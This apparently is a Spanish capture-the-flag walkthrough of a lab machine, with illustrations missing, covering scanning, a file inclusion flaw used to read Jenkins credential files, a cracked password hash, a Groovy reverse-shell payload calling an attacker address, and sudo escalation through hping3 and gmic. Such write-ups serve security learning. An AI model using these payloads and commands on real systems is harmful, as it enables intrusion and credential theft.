Hacemos el escaneo con nmap:
Y esto corre en el puerto 80 y un jenkins en el 8080:
Si hacemos fuzzing al puerto 80 vemos el directorio /webcams:
Y tenemos esta web dentro del directorio webcams:
Dentro de estas webs podemos ver cómo es posible que podamos apuntar contra archivos internos de la máquina víctima:
Por tanto investigamos si en jenkins hay algún archivo donde podamos acceder y ver información sensible:
Y vemos que funciona:
view-source:http://192.168.0.76/webcams/includecam.php?cam=/var/lib/jenkins/users/users
andrew_15328478385288074167
Pero si añadimos config dentro de la url, podremos obtener la contraseña de este usuario:
view-source:http://192.168.0.80/webcams/includecam.php?cam=/var/lib/jenkins/users/andrew_15328478385288074167/config
Por tanto, nos copiamos este hash dentro de un archivo y lo crackeamos con john the ripper:
jbcrypt:$2a$10$V.wxGyfowdGEVLvpQt5DROedmKKUp11g922/V.tb1xmi8eYe7rmzu
Por tanto ya tenemos las siguientes credenciales para entrar dentro del panel de administración de jenkins:
andrew:andrew1
Y estamos dentro:
En este punto vamos a explotar una vulnerabilidad parecida a la máquina MAQUINA INTERNAL (wordpress wpscan, hydra http, portforwarding chisel y hacking jenkins en docker):
Una vez aquí, pegamos el siguiente payload:
String host="10.8.100.91"; int port=444; String cmd="bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Y con netcat habremos recibido la conexión:
Tenemos el usuario andrew:
Y vemos este permiso de sudo:
Y podemos convertirnos en el usuario andrew de la siguiente forma:
sudo -u andrew /usr/sbin/hping3 /bin/bash
Y volvemos a enumerar permisos de sudo:
Y esto es lo que hace ese binario gmic:
Y dentro del manual de instrucciones de esto, tenemos como ejecutar un comando con gmic:
https://fr.manpages.org/gmic
Por tanto, ejecutamos este comando y ya somos root:
sudo /usr/bin/gmic -exec bash





















